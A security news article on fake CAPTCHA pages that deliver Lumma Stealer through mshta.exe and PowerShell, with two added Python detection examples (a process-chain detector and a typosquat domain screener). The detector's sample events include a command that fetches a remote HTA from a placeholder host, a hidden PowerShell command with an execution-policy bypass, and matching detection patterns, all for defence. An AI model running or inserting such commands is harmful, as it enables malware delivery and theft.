Fake CAPTCHA Malware Targets Multiple Industries

Fake CAPTCHA campaigns are being used to spread the Lumma information stealer globally, targeting industries such as healthcare, banking, and telecommunications. The campaign affects countries including Argentina, Colombia, the U.S., and the Philippines, according to a recent report.

The attack begins when users visit compromised websites. These sites redirect visitors to a fake CAPTCHA page that tricks them into running a command on their computer. This command uses the Windows mshta.exe tool to download and execute a harmful HTA file from a remote server.

This file runs a PowerShell command that launches a multi-stage process. The process includes unpacking scripts to bypass the Windows Antimalware Scan Interface (AMSI) and downloading the Lumma Stealer payload. Because the victim runs the command outside the browser, the attackers bypass standard browser-based defenses.
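The chain described above (a fake CAPTCHA page leading to mshta.exe fetching a remote HTA, which then hands off to PowerShell) leaves a recognisable trail in process-creation telemetry. The following is an added example, not code from the report or from any vendor, showing how a defender might flag that trail in a batch of Sysmon- or EDR-style process events. The event records and field names are constructed for the example; the three rules are assumptions about what the chain looks like on an endpoint, not facts taken from the report.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed schema for this example)."""
    parent: str   # parent process image name
    image: str    # created process image name
    cmdline: str  # full command line of the created process


# Constructed sample events, not real telemetry. The first two mimic the
# fake-CAPTCHA chain; the rest are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "mshta.exe",
              "mshta.exe https://example.invalid/verify.hta"),
    ProcEvent("mshta.exe", "powershell.exe",
              'powershell.exe -w hidden -ep bypass -c "<stage-2 omitted>"'),
    ProcEvent("explorer.exe", "chrome.exe",
              '"C:\\Program Files\\Google\\Chrome\\chrome.exe"'),
    ProcEvent("explorer.exe", "mshta.exe",
              "mshta.exe C:\\Users\\alice\\Documents\\report.hta"),
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell.exe -Command Get-Date"),
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-(?:w|windowstyle)\s+hidden", re.IGNORECASE)
BYPASS_RE = re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of detection reasons that apply to one event (empty = benign)."""
    reasons = []
    image = ev.image.lower()
    parent = ev.parent.lower()

    # Rule 1: mshta.exe told to load its HTA straight from a remote URL.
    # A locally saved .hta (SAMPLE_EVENTS[3]) deliberately does not match here.
    if image == "mshta.exe" and URL_RE.search(ev.cmdline):
        reasons.append("mshta.exe launched with a remote URL")

    # Rule 2: the HTA hands off to a scripting host such as PowerShell.
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        reasons.append(f"mshta.exe spawned {image}")

    # Rule 3: hidden PowerShell window combined with an execution-policy bypass.
    if image in ("powershell.exe", "pwsh.exe") \
            and HIDDEN_RE.search(ev.cmdline) and BYPASS_RE.search(ev.cmdline):
        reasons.append("hidden PowerShell with execution-policy bypass")

    return reasons


def scan(events: list[ProcEvent]) -> list[dict]:
    """Run classify() over a batch and return only the events that fired."""
    hits = []
    for idx, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            hits.append({"index": idx, "parent": ev.parent,
                         "image": ev.image, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"[{hit['index']}] {hit['parent']} -> {hit['image']}: "
              + "; ".join(hit["reasons"]))
```

Rules 1 and 2 are the ones worth alerting on by themselves; rule 3 fires on plenty of legitimate administration scripts and is better used to raise the severity of a rule 1 or rule 2 hit than as a stand-alone alert.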

Lumma Stealer operates as malware-as-a-service (MaaS), allowing cybercriminals to distribute it efficiently. Recent delivery methods include nearly 1,000 fake domains mimicking trusted platforms like Reddit and WeTransfer. These fake sites offer password-protected archives that contain a malicious AutoIt-based dropper, which deploys the stealer.
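Domains that impersonate Reddit or WeTransfer can be caught before a user reaches them by screening DNS or proxy logs for look-alike names. The block below is an added example, not code from the report, that flags a hostname when its registrable label either embeds a protected brand name or sits within a small edit distance of it, while letting the brand's genuine domains through. The brand-to-domain allowlist, the sample hostnames (all under reserved test TLDs) and the distance threshold of 2 are assumptions chosen for the example.

```python
# Assumed allowlist of brands and the domains legitimately serving them.
BRANDS = {
    "reddit": {"reddit.com"},
    "wetransfer": {"wetransfer.com"},
}

# Constructed sample hostnames as they might appear in DNS or proxy logs.
SAMPLE_HOSTS = [
    "www.reddit.com",              # genuine, must pass
    "reddit-download.test",        # brand embedded in an unrelated domain
    "redit.test",                  # one character dropped
    "wetransfer.com",              # genuine, must pass
    "files.wetranfser.test",       # two letters swapped
    "intranet.corp.test",          # unrelated, must pass
]

MAX_DISTANCE = 2  # assumed threshold for "close enough to be a typosquat"


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute) with a rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def registrable(host: str) -> str:
    """Naive 'last two labels' registrable domain; good enough for the sample
    TLDs here. A real deployment should use a public-suffix list instead."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def lookalike_reasons(host: str) -> list[str]:
    """Return why a host looks like brand impersonation (empty = not suspicious)."""
    reg = registrable(host)
    label = reg.split(".")[0]
    reasons = []
    for brand, legit in BRANDS.items():
        if reg in legit:
            return []  # exact match on an approved domain wins outright
        if brand in label:
            reasons.append(f"'{reg}' embeds brand '{brand}' but is not an approved domain")
        elif levenshtein(label, brand) <= MAX_DISTANCE:
            reasons.append(f"label '{label}' is within {MAX_DISTANCE} edits of '{brand}'")
    return reasons


def screen(hosts: list[str]) -> dict[str, list[str]]:
    """Map each suspicious host to its reasons; clean hosts are omitted."""
    return {h: r for h in hosts if (r := lookalike_reasons(h))}


if __name__ == "__main__":
    for host, reasons in screen(SAMPLE_HOSTS).items():
        print(f"{host}: " + "; ".join(reasons))
```

The substring rule catches the "brand plus extra words" pattern (reddit-download, wetransfer-share) and the edit-distance rule catches single-character typos and transpositions; neither covers homoglyph abuse, which needs a Unicode confusables check on top.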

Similar tactics were observed earlier this year when over 1,300 fake domains impersonated AnyDesk to distribute Vidar Stealer malware. Meanwhile, an updated phishing toolkit called Tycoon 2FA complicates detection by security tools. It uses legitimate or compromised email accounts to send phishing messages and detects attempts to inspect its web pages.

Additionally, attackers have exploited Gravatar profiles to mimic services like AT&T and Proton Mail, tricking users into entering credentials. These tailored social engineering techniques further enhance their success rates.

Preventing the Threat

Organizations must focus on comprehensive cybersecurity measures to counter these threats. Regular software updates, strict email filtering, and user training can help prevent malware execution; training in particular should cover the fake CAPTCHA lure, since the attack depends on the user pasting a command outside the browser. Behavioral analytics and endpoint detection solutions can catch the mshta.exe-to-PowerShell chain at runtime. Blocking access to suspicious domains and monitoring for unusual user activity can also reduce the risk.